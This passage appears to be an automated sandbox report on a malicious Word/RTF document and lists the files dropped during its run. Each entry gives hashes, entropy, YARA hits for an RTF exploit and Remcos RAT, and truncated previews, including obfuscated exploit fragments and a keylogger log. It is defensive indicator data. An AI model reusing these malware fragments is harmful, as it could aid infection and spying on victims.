                                                                                                                        Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[
                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):247044
                                                                                                                        Entropy (8bit):3.7540611984178978
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
                                                                                                                        MD5:AFA95FFEF9A1E2EE01B008DA56592B30
                                                                                                                        SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
                                                                                                                        SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
                                                                                                                        SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
                                                                                                                        Malicious:false
                                                                                                                        Preview:..L.l.i.k.N.k.f.R.e.C.q.C.K.L.U.B.G.e.u.c.f.z.f.P. .=. .".G.L.I.l.i.f.L.U.A.W.n.p.h.k.G.U.x.A.c.B.K.A.L.i.".....i.f.G.t.L.K.W.W.U.C.G.P.m.N.m.g.a.k.i.z.o.O.W.C. .=. .".e.R.K.t.W.u.C.G.W.K.W.K.B.c.O.P.j.i.P.W.O.L.l.i.".....K.W.x.z.L.f.k.A.f.N.m.T.f.W.a.L.f.g.T.c.O.i.h.i. .=. .".L.G.O.z.m.B.A.j.G.L.l.Q.G.W.o.h.f.z.W.W.k.P.U.s.".....C.W.Z.p.G.A.b.l.B.W.h.R.d.K.v.c.N.W.W.h.c.o.A.T. .=. .".o.U.a.U.e.W.h.W.c.K.C.T.c.I.d.c.q.a.h.U.a.R.h.B.".....i.L.U.x.d.z.m.L.u.i.q.x.c.c.A.L.C.v.N.c.i.o.U.A. .=. .".G.W.c.N.P.f.N.K.o.m.L.U.P.J.Z.h.O.d.p.p.C.o.i.K.".....c.L.t.U.N.c.C.x.e.W.Z.d.B.T.p.g.U.L.Z.W.q.b.U.K. .=. .".O.K.W.W.p.W.l.o.K.L.f.W.A.P.z.k.U.e.L.L.U.R.m.W.".....i.u.K.s.x.s.h.J.c.K.B.n.G.k.m.m.r.G.H.l.C.h.N.q. .=. .".G.k.c.f.U.k.W.i.h.z.R.z.G.G.C.L.C.U.c.Z.P.G.i.W.".....W.u.i.L.K.f.a.W.W.c.G.Z.W.Z.J.f.I.P.C.Z.O.f.h.N. .=. .".a.N.b.K.K.b.f.k.W.L.K.z.K.u.C.p.W.R.m.N.f.L.W.L.".....L.q.m.P.K.z.v.m.A.K.G.W.N.N.W.G.A.l.L.i.o.W.A.k. .=. .".s.S.Z.I.c.i.W.K.L.K.O.L.o.W.N.b.K.C.U.L.k.t.q.d.".....d.Q.z.O.
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Rich Text Format data, version 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):115666
                                                                                                                        Entropy (8bit):2.7217050368726605
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
                                                                                                                        MD5:5EAD5713E1263695BFF52404264DD3B4
                                                                                                                        SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
                                                                                                                        SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
                                                                                                                        SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4471D5D4.doc, Author: ditekSHen
                                                                                                                        Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):66768
                                                                                                                        Entropy (8bit):2.9045642362096498
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:gQbwIVguebyln1oBJ7v4rPMPRDJWKf4kfeHHCCKlRFwiACs:gQb5Tebyl1ojvw4RlWKf41HHC/KiACs
                                                                                                                        MD5:7DC8E1999A1AF96FE63D5E493356A288
                                                                                                                        SHA1:705D5C1FFDF27BF31F6408A1F98FA01547375612
                                                                                                                        SHA-256:611408FC701324B9EE55DE35EF19AA58103007691865E3900EC6E03BDE70F0C9
                                                                                                                        SHA-512:9275DD7D20A0EC72C0E8F1291EEB2237E6464857B50D114E3F615CFC27199EB07256BA65DD04BFDD664EAEBCC50909370D0E42FC10DA8863C3D6413B54DBB622
                                                                                                                        Malicious:false
                                                                                                                        Preview:....l...........k...................@.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):318964
                                                                                                                        Entropy (8bit):5.498202232475241
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:hxelS/aoQOP7D4mD3f5R81Zk6ZJE6GOolsvm8:hxelSL34mD3f5ReZdZJElOFm8
                                                                                                                        MD5:1E74425F96A5DDD00E5494225278C22A
                                                                                                                        SHA1:97D7ADC10C419F1EBF2B2754CDFEFD3371CD95B9
                                                                                                                        SHA-256:420C08455ABFF24376B505BC34EE9021A10C5BF5285D3FD038778409EC78B67C
                                                                                                                        SHA-512:E0232C415E1171AABA244152F0D4CDD8328E0EF051FC24CFD2B472199A0AE41A451401A3492C04A612A9ACD3407047047C8A170A4B2A68EB80B4B862B699EA1B
                                                                                                                        Malicious:false
                                                                                                                        Preview:....l...............2...........@m..?... EMF........ .......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):134544
                                                                                                                        Entropy (8bit):2.9989105127453892
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:SxZNfNMxUS1u40TiTKAvGNeni/m8xXZOm:oZNu6i0TiTKeYh/tTT
                                                                                                                        MD5:A01193C207CD2FE313F5CEDA3FD76B7A
                                                                                                                        SHA1:62173798263F9D7310F3F5942668DEA29AA5A90F
                                                                                                                        SHA-256:6E7BB9F3D39B5A50FA8FD08B066B0A92001BEAEAE96C9FCBFDB5BCFB9F0F6C20
                                                                                                                        SHA-512:6B4344CC538B502EF1F6D3C9FAF2973096B40054A0648078FEF21F451FF61A11906E9BEF01DE80EA4EE032EC8C17877FCC9FB05493512DC210FDA7C5F62F3E22
                                                                                                                        Malicious:false
                                                                                                                        Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n......................................... w. ..0.......)".A.l*w"........atQ.........l*w.........`tQ........0...../....j...........D...../j...........T...{./j.....*wd....O./j.......8....I./ ...h....Y..I./)".A
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):213168
                                                                                                                        Entropy (8bit):2.988970416935335
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:oR4CEQoVghaqdV+9ccR9qyn6z0G1+/WQOyFBUXjM9G2j58ThJAbH92f2bcrjZd0R:l9tkQRmQzpr5Txp1
                                                                                                                        MD5:33B91CBFFE8E675C476B0BA3AFC61062
                                                                                                                        SHA1:447B4D09F2D65DBFB28462556A33A047394E8D97
                                                                                                                        SHA-256:C81DE0EEC367CC4FDDADC14B92EA89BE12C856ACD249D45F93FCD69A8D50FD79
                                                                                                                        SHA-512:3EBB6F881334115B52FC4F426A4F681B22645B967FA03BF367C43CD7BB078C74BBFB7F41ABBB6132429704CB6E338808468E607298B999B63C7D246DA03750F2
                                                                                                                        Malicious:false
                                                                                                                        Preview:....l............................E...U.. EMF.....@..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d.......n......._.......n...|.......!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1921536
                                                                                                                        Entropy (8bit):5.057623805607873
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:SHmzCJEfXMGrc6/XRmzHJEZD3DERnLRmF8Dtc3WxO:S1Kzrc0AobARM8x2
                                                                                                                        MD5:8051E991E5ADA29CDDE9E38B6EE8581B
                                                                                                                        SHA1:B6D7170F31B78240F55ADCFAD2E3B3DBEA5BFB34
                                                                                                                        SHA-256:A691D389184D391B59EA169F866FC8D1FB04D7CAE422F689DC7D81E5736FF224
                                                                                                                        SHA-512:9C057D2F4561C7A1BB412DA32F5E56FEE46F1F24443FB3E707D8647EDB7E0456EB4E04252EDFCF3B594105E381BB3CC2C1264500EC0D788B4F0C1566957038DE
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        Preview:......................>...............................................................................................................................................................~.......T........................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):15392
                                                                                                                        Entropy (8bit):3.6169394259377348
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:7V3yfuaKs05qt4rdS8pAcc/+He4zYh83mVWpwpSJM5Cb:x3yfuX1wtUS8acvek3rkLCb
                                                                                                                        MD5:26E692E61933937B3679783CFAC52D93
                                                                                                                        SHA1:42979A944A075224A77B57ACA1C5150B8B1DECED
                                                                                                                        SHA-256:694AE2F22B61806025B249558E1BCDD640C96184570977848ABD82400A88382F
                                                                                                                        SHA-512:913C823B277F9C8B5FF01A6D4F8FBFC8E45DB52DF15FA070200968889F97131A191C7E3A5A9EC5DF20B92EF91319A0500C1937B8819BE4330CA1DCC9C4EB2BB5
                                                                                                                        Malicious:false
                                                                                                                        Preview:7.4.8.5.1.1.1.5.9.1.[.2.2.5.1.+.).;.5./.!.@.*.:.4._.[.?.9.`.9...'.|.>.!.9.<.!.^.3.%.+.^.|.~.%.*.?.+.2.<.7.%.:...`.?.].1.|.?.=.,.8.%...~.#./.:.%.?.<.<.!.|.$.6.%.+.?.9.%.!.2.?...%.=._.].1.1.'.'.9.?.3.7.%.8.~.7.?.$./.,.#...&.+.2.:./.)._...'.;.-.].|.?.=.!.*.).?.*.(.].&.4.4.`.1.*...8.?.:.@.<._...$...,.2.6.=.#.6.#.`.?.^.~.$.5.9.>.<./.%.~.%.%.=.*.?.4.@...4.=.?.?.2.4.~.?._.=.%...)...^._.^.[.*.1.|.7.#.$.*.$.%.>.7.8...$./...).7._.].?.,.2.8.4.).0.+.`./.7.*.6.>._.+.~.5.5.>.*.9.;.@.=.2.|.)...&.%.6.;.?.@./.~.../.?...=.,.?.3.1.3.$.!...~.9.4.#.3...[.[...~.4._.(.?.].:.@.~.[.`.%.#.#.>.!.!.`...7...$.!.+.#...&.,.~.=.[.#.?.*.'._.].;.^.3.].[.6.!.@.|.?.;.%.8.<.@.<.].).8...#.-.8.2.>.=.'._./.7.7.6.6.:.`.8.*._.*.`.,.~...?.<.8.2.:.[.<.%.?.%.?./..._.2.;.[./.?.7.?.*...4.0.,.^...!.?.(.@.].%.4.^.!.:.~...%.-.@.(...4.'.5.8.!...3.:.).(.+...=.?...-.2.4.?.^.?...;.?.=.?.`..._.[.*.$.;.^._.;.;.8.#...7.=.'.6.:._.*.*./.5.6.-.;.=.%.].5.8.^.,.#...<.*...%./.*.%.8.).(.&.#.(.$.%.|.|.!.-...|.8.|.`.).0.'.!.8...?.[.@.(.%.&.%.;.4.-.;.
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1024
                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1536
                                                                                                                        Entropy (8bit):2.8462879894458504
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:YXHH3HpkyKptyKpkyKptECbeT+dE/fd0Ivk2WWHsmXT7MTe2IXTesZSDMz:In3jK+KjKDrd8NvRsMXMHmyMz
                                                                                                                        MD5:8024A9B919C00968F5F9BBE6B6B6226B
                                                                                                                        SHA1:33A9B07B4709CAB429DB14CEA49A9B538305F51A
                                                                                                                        SHA-256:7CEB9E403F7C09773FC2646D85D42C6F97B0641B35BC74A2ACDBA6AF9AD7088E
                                                                                                                        SHA-512:CA97FF409D7F96DBB570C0FB03D21F0083A3349F72CBDF95EC04A70E9E868DC5D18BB5F8E43ADCAD068E6B003E5E2623C1D2F72785E9EC99F604E8DF03996579
                                                                                                                        Malicious:false
                                                                                                                        Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>...........................E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...5.4.=.5...5._.2.......................................................................................................................................................................................................t...v...x...z...~............................................................................................................................................................................................................................................................................................................................................................................................................d........gd........
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0eb1021d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):21037056
                                                                                                                        Entropy (8bit):1.1388602541684343
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:CO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:COEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                        MD5:2A27EC04E6FA6DD61546C72B6D0CB412
                                                                                                                        SHA1:80EBADD71210CF1ACB07C09B61A60E30FFAA8659
                                                                                                                        SHA-256:5B1210812D078A0EDD477ECC2DC1E2293566B6CB56B88D5D83FE6D6A1BED7C7B
                                                                                                                        SHA-512:5C3D94E75C306BE9FD0673EBFD34725DF28A957A84CA62685D435C24AF5B5047510107BE36B57CFDAAEB59C71BF7B5F52BA4E574FFC9417175F2B256B94ECA59
                                                                                                                        Malicious:false
                                                                                                                        Preview:....... ........................u..............................;:...{..:;...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):334
                                                                                                                        Entropy (8bit):3.486611041284527
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:6lQlp5YcIeeDAlarU4zlmHSNombQOfxNa/WAv:6lwxecArUnyp50/W+
                                                                                                                        MD5:6FBF683FFBCA3CE4508CAC609E6DE5DE
                                                                                                                        SHA1:401DCE511DAE5CDD6849CBD2F16CAC44E72857FB
                                                                                                                        SHA-256:5F6D74DC691C7549A4246DEB996D220AE46ADFCF9E320AC62D81C2AFE2846B7B
                                                                                                                        SHA-512:B8DD66CC7CADF37FD131B38BADEC28433A1CDF47AED0E2CDD5DA9E22DED6226941265C97F33E84E31D28C434C58C07AB8CB94FA70B10F8D0455C26C36F1AEF48
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, Author: Joe Security
                                                                                                                        Preview:....[.2.0.2.4./.0.9./.3.0. .0.9.:.0.0.:.2.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.f.a.c.t.u.r.a. .p.r.o.f.o.r.m.a. ...d.o.c.x. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2
                                                                                                                        Entropy (8bit):1.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                        Malicious:false
                                                                                                                        Preview:..
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):131072
                                                                                                                        Entropy (8bit):0.02549955617514913
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:I3DPc4yXvxggLR9fTtyOM7pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPhy/J7KvYg3J/
                                                                                                                        MD5:665D119C079815C5C7BA8979D3A0547C
                                                                                                                        SHA1:25D4B1813506623251AD3FA7EFB4A19AEE3FBE27
                                                                                                                        SHA-256:F1D4FD6DAEEFC744F440BEA7E603E736D3DC2243DD3A09E50F1DE5A082522FD5
                                                                                                                        SHA-512:77281F250300E85D64D54B2893DCFC0CB0880808BACB21B8D55A19849B323689650B1D7065ED636A82CFEBC2ED5393B27A3A0937928479B6BDF7B1D8E639E205
                                                                                                                        Malicious:false
                                                                                                                        Preview:......M.eFy...z....7..A...zZ...S,...X.F...Fa.q.............................w6.:.YG..e............<.....H....b'.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):131072
                                                                                                                        Entropy (8bit):0.025729587119441094
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:I3DPcboL85HvxggLRbKdDJf/l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPMoAvIfbvYg3J/
                                                                                                                        MD5:EABF550161FAB01EC8D8FE5199533A70
                                                                                                                        SHA1:3C2B01C00B272BFA8D6F7A96C10E9D17112E7FB3
                                                                                                                        SHA-256:6F4486AD8D5168946DFD22926E2242D9420638F30C0C51A7C9A3ABBF9A3F88A4
